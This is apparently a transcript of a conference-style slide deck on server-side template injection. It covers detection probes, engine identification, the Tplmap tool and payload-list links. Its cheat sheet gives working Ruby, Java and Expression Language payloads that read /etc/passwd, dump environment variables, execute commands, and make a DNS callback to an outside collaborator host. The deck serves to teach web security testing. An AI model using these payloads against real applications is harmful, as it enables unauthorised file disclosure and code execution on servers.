Server Side Template Injection

Whoami Dhamotharan Offensive Web Application Security Researcher Occasional bug bounty hunter on Hackerone ,Bugcrowd, etc. Dhamu_offi on twitter

AGENDA Template Injection What is SSTI Methodology Automated Tools Cheatsheet Demo

Template Injection Template injection allows an attacker to include template code into an existing (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages

Template Injection Template engines are designed to combine templates with a data model to produce result documents which helps populating dynamic data into web pages. Template engines can be used to display information about users, products etc. Some of the most popular template engines can be listed as the followings: ● PHP – Smarty, Twigs ● Java – Velocity, Freemaker ● Python – JINJA, Mako, Tornado ● JavaScript – Jade, Rage ● Ruby – Liquid

Server Side Template Injection SSTI Tip Server-side template injection is a vulnerability where the attacker injects malicious input into a template to execute commands on the server- side.

SSTI Server-side template injection is a vulnerability where the attacker injects malicious input into a template to execute commands on the server-side. This vulnerability occurs when invalid user input is embedded into the template engine which can generally lead to remote code execution (RCE)

Tip ${7*7} ${{7*7}} #{ 7 * 7 } <%= 7 * 7 %>

Server Side Template Injection Methodology

Methodology ➔ Detect ➔ Identify ➔ Exploit

Detect. This vulnerability can appear in two distinct contexts, each of which requires its own detection method: 1. Plaintext context 2. Code context Tip smarty=Hello {user.name} Hello user1 smarty=Hello ${7*7} Hello 49 Story for illustration purposes only Tip personal_greeting=use rname Hello user0

Plaintext context The given input is being rendered and reflected into the response. Try to set mathematical operations within a template expression: Tip render('Hello ' + username) http://vulnerable- website.com/?username=$ {7*7} {{7*7}} ${7*7} <%= 7*7 %> ${{7*7}}

Code Context In these cases the user input is being placed within a template expression: Tip greeting = getQueryParameter('greeting') engine.render("Hello {{"+greeting+"}}", data) http://vulnerable- website.com/?greeting=data.usernam e}}

Identify The template injection potential, the next step is to identify the template engine. Although there are a huge number of templating languages, many of them use very similar syntax that is specifically chosen not to clash with HTML characters. As a result, it can be relatively simple to create probing payloads to test which template engine is being used.

No content

Exploit Template engines to show the exploit methodology in practice, and make a case for the severity of the issue. The findings may appear to show flaws in template engines themselves, but unless an engine markets itself as suitable for user-submitted templates the responsibility for preventing template injection ultimately lies with web application developers. Lists of builtin methods, functions, filters, and variables. Lists of extensions/plugins - some may be enabled by default.

Exploit Generic In this wordlist you can find variables defined in the environments of some of the engines mentioned below: https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines- special-vars.txt https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Sid e%20Template%20Injection

Automated Tools Tplmap assists in the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with several sandbox escape techniques to get access to the underlying operating system. The tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tools during web application penetration tests.

No content

No content

No content

CheatSheet ● Ruby ○ Basic injections ○ Retrieve /etc/passwd ○ List files and directories ● Java ○ Basic injection ○ Retrieve the system’s environment variables ○ Retrieve /etc/passwd ● Expression Language EL ○ Basic injection ○ Code execution

Ruby - Basic injections ERB: <%= 7 * 7 %> Slim: #{ 7 * 7 } Ruby - Retrieve /etc/passwd <%= File.open('/etc/passwd').read %> Ruby - List files and directories <%= Dir.entries('/') %>

Java - Basic injection ${7*7} ${class.getClassLoader()} Java - Retrieve the system’s environment variables ${T(java.lang.System).getenv()} Java - Retrieve /etc/passwd ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

Expression Language EL Expression Language EL - Basic injection ${1+1} #{1+1} Expression Language EL - One-Liner injections not including code execution // DNS Lookup ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.bur pcollaborator.net")}

Demo

No content

No content

No content

No content

Server-Side-Template-Injection - Linux - Privilege Escalation https://github.com/Dhamuharker/Server-Side-Template- Injection

Thank you